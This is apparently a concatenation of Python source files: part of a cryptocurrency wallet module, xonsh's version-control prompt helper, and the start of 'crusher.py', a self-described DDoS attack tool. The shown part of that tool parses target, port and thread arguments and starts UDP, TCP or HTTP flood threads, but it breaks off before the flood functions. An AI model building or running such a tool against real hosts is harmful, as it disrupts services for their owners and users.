req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_full_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self):
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return STO_EV_XPUB_PW
else:
return STO_EV_USER_PW
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, encrypt_storage=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = STO_EV_PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_full_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_full_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
def check_password(self, password):
for name, keystore in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
# multisig wallets are not offered hw device encryption
return STO_EV_USER_PW
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, passphrase=None, password=None,
encrypt_file=True, seed_type=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
if seed_type == 'electrum':
seed = mnemo.Mnemonic_Electrum('en').make_seed()
elif seed_type in [None, "bip39"]:
seed = mnemo.make_bip39_words('english')
seed_type = "bip39"
else:
raise keystore.InvalidSeed(
f"Seed type {seed_type} not supported for new wallet creation"
)
k = keystore.from_seed(seed, passphrase, seed_type=seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif mnemo.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt_storage=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
vc.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branches"""
# pylint:disable=no-member, invalid-name
import os
import sys
import queue
import builtins
import threading
import subprocess
import re
import xonsh.tools as xt
from xonsh.lazyasd import LazyObject
RE_REMOVE_ANSI = LazyObject(
lambda: re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]"),
globals(),
"RE_REMOVE_ANSI",
)
def _get_git_branch(q):
denv = builtins.__xonsh__.env.detype()
try:
branches = xt.decode_bytes(
subprocess.check_output(
["git", "branch"], env=denv, stderr=subprocess.DEVNULL
)
).splitlines()
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
else:
for branch in branches:
if not branch.startswith("* "):
continue
elif branch.endswith(")"):
branch = branch.split()[-1][:-1]
else:
branch = branch.split()[-1]
q.put(branch)
break
else:
q.put(None)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
# branch = RE_REMOVE_ANSI.sub("", branch or "")
if branch:
branch = RE_REMOVE_ANSI.sub("", branch)
except queue.Empty:
branch = None
return branch
def _get_hg_root(q):
_curpwd = builtins.__xonsh__.env["PWD"]
while True:
if not os.path.isdir(_curpwd):
return False
try:
dot_hg_is_in_curwd = any([b.name == ".hg" for b in xt.scandir(_curpwd)])
except OSError:
return False
if dot_hg_is_in_curwd:
q.put(_curpwd)
break
else:
_oldpwd = _curpwd
_curpwd = os.path.split(_curpwd)[0]
if _oldpwd == _curpwd:
return False
def get_hg_branch(root=None):
"""Try to get the mercurial branch of the current directory,
return None if not in a repo or subprocess.TimeoutExpired if timed out.
"""
env = builtins.__xonsh__.env
timeout = env["VC_BRANCH_TIMEOUT"]
q = queue.Queue()
t = threading.Thread(target=_get_hg_root, args=(q,))
t.start()
t.join(timeout=timeout)
try:
root = q.get_nowait()
except queue.Empty:
return None
if env.get("VC_HG_SHOW_BRANCH"):
# get branch name
branch_path = os.path.sep.join([root, ".hg", "branch"])
if os.path.exists(branch_path):
with open(branch_path, "r") as branch_file:
branch = branch_file.read()
else:
branch = "default"
else:
branch = ""
# add bookmark, if we can
bookmark_path = os.path.sep.join([root, ".hg", "bookmarks.current"])
if os.path.exists(bookmark_path):
with open(bookmark_path, "r") as bookmark_file:
active_bookmark = bookmark_file.read()
if env.get("VC_HG_SHOW_BRANCH") is True:
branch = "{0}, {1}".format(
*(b.strip(os.linesep) for b in (branch, active_bookmark))
)
else:
branch = active_bookmark.strip(os.linesep)
else:
branch = branch.strip(os.linesep)
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh__.env["SUPPRESS_BRANCH_TIMEOUT_MESSAGE"]
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print(
"xonsh: branch timeout: computing the branch name, color, or both "
"timed out while formatting the prompt. You may avoid this by "
"increasing the value of $VC_BRANCH_TIMEOUT or by removing branch "
"fields, like {curr_branch}, from your $PROMPT. See the FAQ "
"for more details. This message will be suppressed for the remainder "
"of this session. To suppress this message permanently, set "
"$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.",
file=sys.stderr,
)
def current_branch():
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
branch = None
cmds = builtins.__xonsh__.commands_cache
# check for binary only once
if cmds.is_empty():
has_git = bool(cmds.locate_binary("git", ignore_alias=True))
has_hg = bool(cmds.locate_binary("hg", ignore_alias=True))
else:
has_git = bool(cmds.lazy_locate_binary("git", ignore_alias=True))
has_hg = bool(cmds.lazy_locate_binary("hg", ignore_alias=True))
if has_git:
branch = get_git_branch()
if not branch and has_hg:
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = "<branch-timeout>"
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
status = None
denv = builtins.__xonsh__.env.detype()
try:
cmd = ["git", "status", "--porcelain"]
if include_untracked:
cmd.append("--untracked-files=normal")
else:
cmd.append("--untracked-files=no")
status = subprocess.check_output(cmd, stderr=subprocess.DEVNULL, env=denv)
except (subprocess.CalledProcessError, OSError, FileNotFoundError):
q.put(None)
if status is not None:
return q.put(bool(status))
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh__.env.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(
target=_git_dirty_working_directory, args=(q, include_untracked)
)
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be determined, None is returned.
"""
env = builtins.__xonsh__.env
cwd = env["PWD"]
denv = env.detype()
vcbt = env["VC_BRANCH_TIMEOUT"]
# Override user configurations settings and aliases
denv["HGRCPATH"] = ""
try:
s = subprocess.check_output(
["hg", "identify", "--id"],
stderr=subprocess.PIPE,
cwd=cwd,
timeout=vcbt,
universal_newlines=True,
env=denv,
)
return s.strip(os.linesep).endswith("+")
except (
subprocess.CalledProcessError,
subprocess.TimeoutExpired,
FileNotFoundError,
):
return None
def dirty_working_directory():
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
cmds = builtins.__xonsh__.commands_cache
if cmds.lazy_locate_binary("git", ignore_alias=True):
dwd = git_dirty_working_directory()
if cmds.lazy_locate_binary("hg", ignore_alias=True) and dwd is None:
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BOLD_INTENSE_YELLOW}"
elif dwd:
color = "{BOLD_INTENSE_RED}"
else:
color = "{BOLD_INTENSE_GREEN}"
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are background colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = "{BACKGROUND_YELLOW}"
elif dwd:
color = "{BACKGROUND_RED}"
else:
color = "{BACKGROUND_GREEN}"
return color
|
crusher.py
|
import stuff.banner
import argparse
import sys
import threading
import random
import socket
import time
# Arguments #
parser = argparse.ArgumentParser(
prog="Crusher",
description="A Powerful, Modern DDoS Attack Tool",
epilog="Copyright (c) 2020, Paxv28, All rights reserved."
)
parser.add_argument(
"-t",
"--target",
type=str,
metavar="<IP>",
help="Set Target IP"
)
parser.add_argument(
"-p",
"--port",
type=int,
metavar="<PORT>",
help="Set Target Port"
)
parser.add_argument(
"-th",
"--threads",
type=int,
default=50,
metavar="<THREADS>",
help="Set Threads Num | Default 50"
)
parser.add_argument(
"-m",
"--method",
metavar="<TCP/HTTP/UDP>",
help="Set Attack Method"
)
args = parser.parse_args()
method = str(args.method).upper()
threads = args.threads
target = args.target
port = args.port
# Argument End #
def main():
if method == 'UDP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
try:
time.sleep(10)
except KeyboardInterrupt:
print("[!] Ctrl + C Pressed / Exting...")
sys.exit(0)
th = threading.Thread(target=udp)
th.start()
except Exception as err:
print("Error: \n{err}")
break
else:
continue
elif method == 'TCP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
time.sleep(10)
th = threading.Thread(target=tcp)
th.start()
except Exception as err:
print("Error: \n{err}")
break
elif method == 'HTTP':
for i in range(threads):
try:
print("[*] Attack Starting in 10s")
time.sleep(10)
